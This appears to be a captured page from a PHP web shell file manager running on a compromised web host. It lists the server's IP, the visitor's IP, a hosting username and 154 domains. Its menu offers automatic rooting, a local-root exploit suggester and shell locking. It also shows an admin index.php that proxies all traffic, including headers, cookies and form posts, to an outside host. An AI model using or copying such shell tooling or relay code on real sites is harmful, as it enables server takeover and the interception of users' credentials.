Linux 186-227-203-186.cprapid.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
Apache
Server IP : 186.227.203.186 & Your IP : 216.73.217.146
Domains : 154 Domain
User : pmcaxingo
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
home /
pmcaxingo /
public_html /
admin /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-12-30 15:35
cgi-bin
[ DIR ]
drwxr-xr-x
2026-01-05 14:32
.htaccess
473
B
-rw-r--r--
2026-04-30 03:06
index.php
2.26
KB
-rw-r--r--
2025-12-30 15:35
Save
Rename
<?php $base = 'https://tweb.inf.br/admin'; $path = $_SERVER['REQUEST_URI']; // Remove o prefixo /admin se existir no request $path = preg_replace('#^/admin#i', '', $path); // Monta URL final sem duplicar $url = rtrim($base, '/') . '/' . ltrim($path, '/'); $ext = pathinfo($url, PATHINFO_EXTENSION); if (in_array($ext, ['js', 'css', 'png', 'jpg', 'jpeg', 'gif', 'svg', 'woff', 'woff2', 'ttf', 'map'])) { header('Cache-Control: public, max-age=31536000'); } $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $_SERVER['REQUEST_METHOD']); if (in_array($_SERVER['REQUEST_METHOD'], ['POST', 'PUT', 'PATCH'])) { $data = file_get_contents('php://input'); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $headers = []; foreach (getallheaders() as $key => $value) { if (strtolower($key) === 'host') continue; $headers[] = "$key: $value"; } $headers[] = 'X-Client-Domain: ' . $_SERVER['HTTP_HOST']; curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $response = curl_exec($ch); $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $headers = substr($response, 0, $header_size); $body = substr($response, $header_size); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); foreach (explode("\r\n", $headers) as $header) { if (stripos($header, 'Transfer-Encoding') === 0) continue; if (stripos($header, 'Content-Encoding') === 0) continue; if (stripos($header, 'Content-Length') === 0) continue; header($header); } http_response_code($http_code); // ✅ REESCRITA COMPLETA — IMPORTANTE $body = str_replace( [ 'https://tweb.inf.br/admin/', // URLs absolutas 'src="/admin/', // caminhos em src 'href="/admin/', // caminhos em href 'action="/admin/' // formulários ], [ '/', // passa a apontar para o domínio proxy 'src="/', 'href="/', 'action="/' ], $body ); // Também corrige casos raros com URLs relativas usadas em JS $body = str_replace( ['/admin/assets/', '/admin/img-', '/admin/api/'], ['/assets/', '/img-', '/api/'], $body ); echo $body;